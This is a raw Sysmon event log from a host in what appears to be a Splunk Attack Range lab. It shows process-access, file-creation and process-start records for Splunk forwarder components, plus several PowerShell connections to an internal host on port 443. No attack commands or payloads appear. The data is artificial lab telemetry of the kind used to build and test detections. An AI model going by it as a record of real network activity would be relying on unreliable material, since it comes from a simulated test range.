14:56:04.067{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341726Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.067{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341725Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.067{B81B27B7-4012-611D-0500-00000000C801}420436C:\Windows\system32\csrss.exe{B81B27B7-7204-613B-19B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341724Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.067{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341723Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.067{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7204-613B-19B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341722Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:04.062{B81B27B7-7204-613B-19B4-03000000C801}6444C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341743Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:05.365{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=578317964393F1C480BDF20D58C75F7C,SHA256=F5C0856AB6D653C7F1015D637E083CE89E02BB7604D724381F576D6DFFEE1346,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341742Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:05.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=BA051948AF070222FCB2B8B6DF9A4169,SHA256=64DD8F25C643B46E9836CED3CFB708B94F747C384318DBAA4D80236DA52F80DD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341741Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:05.082{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=48035B102EF606F8A67C353B7BDD8B3E,SHA256=85F8C2DE3D52BA1A3B73B2DD6E1F959E206DFF9467BC2931864AB3B1E70B0B0B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341744Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:06.399{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DB505CB65159958687209798E114ED58,SHA256=6A156F75610D9CAECACA5DE3F75A9C1A84BC50E085C72A3DA94764A8C164001C,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341745Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:07.445{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D8207EEC946EEF85F770C1ADFD770E04,SHA256=B2A8FB6F38703923D77BA25AEAF0A1016E9A36825D365372EB57CA02ED1BA1CD,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341747Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:08.713{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=525308B0AFB713D4A23A12F8FB1C647E,SHA256=3CEECE54BBE71F6F8EC81C80B8C2A14794B99C09EDEB2B0242B6B79317CEC1C0,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341746Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:08.462{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7A1247D49DAAF9FEA926717F38C9CAE8,SHA256=BE056160A9B4698181D709579C23AD1A03DEADFE6148ED4DFDEBBF6FE7E867DB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341749Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:09.480{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7AF610839C892A806E8D8A4CB699E289,SHA256=F3B25BFCFE4F2CEB3E708227A36C9B46A70CCF050B03173464774161F78F1861,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341748Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:34.678{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52334-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341751Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:10.496{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3BCAD33D051B128AE56EE6787FAB2065,SHA256=2CB6ED9BC5164C78D8AE48EF9F040FFBD3691BE4A0A1B2F4181C106F09B54DD9,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341750Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:35.078{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52335-false10.0.1.12-8000- 23542300x800000000000000035341752Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:11.543{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9C32BBB98101EC611A4FEDEAEF747C76,SHA256=A6971B1787F1BCD7862D94919A73D5EC04333A8D62239003F53A293F56E13A7F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341753Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:12.560{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=04ACFF2E9D79086CEAFD1F831F2353E7,SHA256=C11EA98D8DF021F471925DB87DC5A957198B4B87BA72F2766A4BCB5CB05F062A,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341755Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:13.827{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=97C23784A730306F06634FCB940B00A5,SHA256=58942D730F5D0154063C37217817284743223744019EE48E7140FFC8A0D160D7,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341754Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:13.580{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EAF5F2F9C0CAB9BEC62AE77AF65F9E6,SHA256=80725546B41757BABB5C8B29A973E9AC1559FE19475C143E078996B198E13A64,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341757Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:14.627{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EB307882DB6B28B9EE62AD341C0E2F05,SHA256=C7C1247DEC85049539CFE5E49E3DCC619838D9D492EED1445A410E9303D0557F,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341756Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:39.693{B81B27B7-4822-613A-788F-03000000C801}6940C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeATTACKRANGE\REED_SCHMIDTtcptruefalse10.0.1.15win-host-987.attackrange.local52336-false10.0.1.16ip-10-0-1-16.us-west-2.compute.internal443https 23542300x800000000000000035341759Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:15.661{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED10852429CC70C20F54F72542C8D4FE,SHA256=EDE70B2DD91D90527E06B58DABED20C6DBC395B4141106273FD7DF1E9B2B5FE8,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 354300x800000000000000035341758Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:40.254{B81B27B7-401D-611D-6900-00000000C801}3616C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-987.attackrange.local52337-false10.0.1.12-8000- 23542300x800000000000000035341760Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:16.679{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60A1C3B972A8FE49CE551AA283835065,SHA256=FDA3F2F5FCA3B96A0B7009E96521388D7A4EC5D34DA0235DBFC8F965449F00CF,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341779Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7211-613B-1CB4-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341778Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341777Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341776Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341775Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4012-611D-0C00-00000000C801}732940C:\Windows\system32\svchost.exe{B81B27B7-4013-611D-2500-00000000C801}1820C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341774Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4012-611D-0500-00000000C801}420984C:\Windows\system32\csrss.exe{B81B27B7-7211-613B-1CB4-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000035341773Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.910{B81B27B7-4013-611D-2700-00000000C801}20763760C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{B81B27B7-7211-613B-1CB4-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000035341772Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.896{B81B27B7-7211-613B-1CB4-03000000C801}4560C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{B81B27B7-4012-611D-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000035341771Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.860{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=255D729E0E8A00CFB7D95BB1FEDC1E90,SHA256=CA451EBBA0F1EF499F689F48D2D89F836F193B9A26AF16CAD98096C7912F9766,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000035341770Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.710{B81B27B7-4024-611D-7300-00000000C801}2188NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B8779BDABA25DF0448E4EF6C11002034,SHA256=3367D2C44D55B17000E46999181B8E0B9F1E47EA3B7751EA1EB4795A6FF0F5E2,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000035341769Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.525{B81B27B7-7211-613B-1BB4-03000000C801}20564916C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{B81B27B7-4013-611D-2700-00000000C801}2076C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341768Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 14:56:17.363{B81B27B7-4014-611D-3000-00000000C801}31443164C:\Windows\system32\conhost.exe{B81B27B7-7211-613B-1BB4-03000000C801}2056C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000035341767Microsoft-Windows-Sysmon/Operationalwin-host-987.attackrange.local-2021-09-10 